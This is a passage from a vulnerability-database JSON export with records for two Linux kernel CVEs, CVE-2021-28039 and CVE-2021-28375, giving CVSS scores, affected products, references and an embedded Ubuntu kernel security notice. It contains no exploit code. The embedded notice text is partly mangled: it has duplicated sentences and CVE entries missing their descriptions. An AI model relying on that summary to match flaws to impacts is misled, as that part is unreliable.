        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "xen \u30d7\u30ed\u30b8\u30a7\u30af\u30c8",
        "version": "project"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "xen \u30d7\u30ed\u30b8\u30a7\u30af\u30c8",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003868"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28039"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:x86:*",
                "cpe_name": [],
                "versionEndIncluding": "5.11.3",
                "versionStartIncluding": "5.9.0",
                "vulnerable": true
              }
            ],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28039"
      }
    ]
  },
  "cve": "CVE-2021-28039",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 2.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 2.1,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2021-28039",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 2.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "VHN-387390",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.0,
            "impactScore": 4.0,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 6.5,
            "baseSeverity": "Medium",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2021-28039",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "Low",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-28039",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202103-475",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-387390",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387390"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003868"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-475"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28039"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered in the Linux kernel 5.9.x through 5.11.3, as used with Xen. In some less-common configurations, an x86 PV guest OS user can crash a Dom0 or driver domain via a large amount of I/O activity. The issue relates to misuse of guest physical addresses when a configuration has CONFIG_XEN_UNPOPULATED_ALLOC but not CONFIG_XEN_BALLOON_MEMORY_HOTPLUG. Linux kernel 5.9.x through 5.11.3 contains a security vulnerability that could be exploited by an attacker to cause the driver to crash",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28039"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003868"
      },
      {
        "db": "VULHUB",
        "id": "VHN-387390"
      }
    ],
    "trust": 1.71
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-28039",
        "trust": 2.5
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/03/05/2",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003868",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-475",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-387390",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387390"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003868"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-475"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28039"
      }
    ]
  },
  "id": "VAR-202103-1030",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387390"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-03-27T22:36:25.890000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux\u00a0Kernel\u00a0Archives Xen\u00a0 project Xen\u00a0 project",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003868"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-131",
        "trust": 1.1
      },
      {
        "problemtype": "Resource exhaustion (CWE-400) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387390"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003868"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28039"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.openwall.com/lists/oss-security/2021/03/05/2"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210409-0001/"
      },
      {
        "trust": 1.7,
        "url": "http://xenbits.xen.org/xsa/advisory-369.html"
      },
      {
        "trust": 1.0,
        "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=882213990d32fd224340a4533f6318dd152be4b2"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28039"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387390"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003868"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-475"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28039"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-387390"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003868"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-475"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28039"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-03-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-387390"
      },
      {
        "date": "2021-11-09T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-003868"
      },
      {
        "date": "2021-03-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-475"
      },
      {
        "date": "2021-03-05T18:15:13.190000",
        "db": "NVD",
        "id": "CVE-2021-28039"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-07-12T00:00:00",
        "db": "VULHUB",
        "id": "VHN-387390"
      },
      {
        "date": "2021-11-09T05:05:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-003868"
      },
      {
        "date": "2022-07-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-475"
      },
      {
        "date": "2024-03-25T01:15:50.483000",
        "db": "NVD",
        "id": "CVE-2021-28039"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-475"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Xen\u00a0 Used in \u00a0Linux\u00a0Kernel\u00a0 Resource Depletion Vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003868"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-475"
      }
    ],
    "trust": 0.6
  }
}

var-202103-1442
Vulnerability from variot

An issue was discovered in the Linux kernel through 5.11.6. fastrpc_internal_invoke in drivers/misc/fastrpc.c does not prevent user applications from sending kernel RPC messages, aka CID-20c40794eb85. This is a related issue to CVE-2019-2308. Vendor is responsible for this vulnerability CID-20c40794eb85 It is published as. This vulnerability is CVE-2019-2308 Vulnerabilities related to.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. This update provides the corresponding Linux kernel updates targeted specifically for Raspberry Pi devices in those same Ubuntu Releases. ========================================================================== Ubuntu Security Notice USN-4949-1 May 11, 2021

linux, linux-aws, linux-azure, linux-gcp, linux-hwe-5.8, linux-kvm, linux-oracle, linux-raspi vulnerabilities ==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 20.10
  • Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-3489)

Manfred Paul discovered that the eBPF implementation in the Linux kernel did not properly track bounds on bitwise operations. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-3491)

It was discovered that the Nouveau GPU driver in the Linux kernel did not properly handle error conditions in some situations. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-25639)

Olivier Benjamin, Norbert Manthey, Martin Mazein, and Jan H. Sch\xf6nherr discovered that the Xen paravirtualization backend in the Linux kernel did not properly propagate errors to frontend drivers in some situations. An attacker in a guest VM could possibly use this to cause a denial of service (host domain crash). (CVE-2021-26930)

Jan Beulich discovered that multiple Xen backends in the Linux kernel did not properly handle certain error conditions under paravirtualization. An attacker in a guest VM could possibly use this to cause a denial of service (host domain crash). A local attacker could possibly use this to gain elevated privileges. (CVE-2021-28375)

It was discovered that the Freescale Gianfar Ethernet driver for the Linux kernel did not properly handle receive queue overrun when jumbo frames were enabled in some situations. An attacker could use this to cause a denial of service (system crash). (CVE-2021-29264)

It was discovered that the USB/IP driver in the Linux kernel contained race conditions during the update of local and shared status. An attacker could use this to cause a denial of service (system crash). An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-29266)

It was discovered that the TIPC protocol implementation in the Linux kernel did not properly validate passed encryption key sizes. A local attacker could use this to cause a denial of service (system crash). A local attacker could use this to cause a denial of service (system crash). (CVE-2021-29650)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.10: linux-image-5.8.0-1024-raspi 5.8.0-1024.27 linux-image-5.8.0-1024-raspi-nolpae 5.8.0-1024.27 linux-image-5.8.0-1027-kvm 5.8.0-1027.29 linux-image-5.8.0-1029-oracle 5.8.0-1029.30 linux-image-5.8.0-1031-gcp 5.8.0-1031.32 linux-image-5.8.0-1032-azure 5.8.0-1032.34 linux-image-5.8.0-1033-aws 5.8.0-1033.35 linux-image-5.8.0-53-generic 5.8.0-53.60 linux-image-5.8.0-53-generic-64k 5.8.0-53.60 linux-image-5.8.0-53-generic-lpae 5.8.0-53.60 linux-image-5.8.0-53-lowlatency 5.8.0-53.60 linux-image-aws 5.8.0.1033.35 linux-image-azure 5.8.0.1032.32 linux-image-gcp 5.8.0.1031.31 linux-image-generic 5.8.0.53.58 linux-image-generic-64k 5.8.0.53.58 linux-image-generic-lpae 5.8.0.53.58 linux-image-gke 5.8.0.1031.31 linux-image-kvm 5.8.0.1027.29 linux-image-lowlatency 5.8.0.53.58 linux-image-oem-20.04 5.8.0.53.58 linux-image-oracle 5.8.0.1029.28 linux-image-raspi 5.8.0.1024.27 linux-image-raspi-nolpae 5.8.0.1024.27 linux-image-virtual 5.8.0.53.58

Ubuntu 20.04 LTS: linux-image-5.8.0-53-generic 5.8.0-53.60~20.04.1 linux-image-5.8.0-53-generic-64k 5.8.0-53.60~20.04.1 linux-image-5.8.0-53-generic-lpae 5.8.0-53.60~20.04.1 linux-image-5.8.0-53-lowlatency 5.8.0-53.60~20.04.1 linux-image-generic-64k-hwe-20.04 5.8.0.53.60~20.04.37 linux-image-generic-hwe-20.04 5.8.0.53.60~20.04.37 linux-image-generic-lpae-hwe-20.04 5.8.0.53.60~20.04.37 linux-image-lowlatency-hwe-20.04 5.8.0.53.60~20.04.37 linux-image-virtual-hwe-20.04 5.8.0.53.60~20.04.37

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://ubuntu.com/security/notices/USN-4949-1 CVE-2020-25639, CVE-2021-26930, CVE-2021-26931, CVE-2021-28375, CVE-2021-29264, CVE-2021-29265, CVE-2021-29266, CVE-2021-29646, CVE-2021-29650, CVE-2021-3489, CVE-2021-3490, CVE-2021-3491

Package Information: https://launchpad.net/ubuntu/+source/linux/5.8.0-53.60 https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1033.35 https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1032.34 https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1031.32 https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1027.29 https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1029.30 https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1024.27 https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-53.60~20.04.1

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202103-1442",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.106"
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.5"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.24"
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11.7"
      },
      {
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004458"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28375"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.24",
                "versionStartIncluding": "5.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.11.7",
                "versionStartIncluding": "5.11",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.106",
                "versionStartIncluding": "5.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28375"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "db": "PACKETSTORM",
        "id": "162541"
      },
      {
        "db": "PACKETSTORM",
        "id": "162550"
      },
      {
        "db": "PACKETSTORM",
        "id": "162543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-961"
      }
    ],
    "trust": 1.1
  },
  "cve": "CVE-2021-28375",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2021-28375",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-387803",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2021-28375",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-28375",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202103-961",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-387803",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387803"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004458"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28375"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-961"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
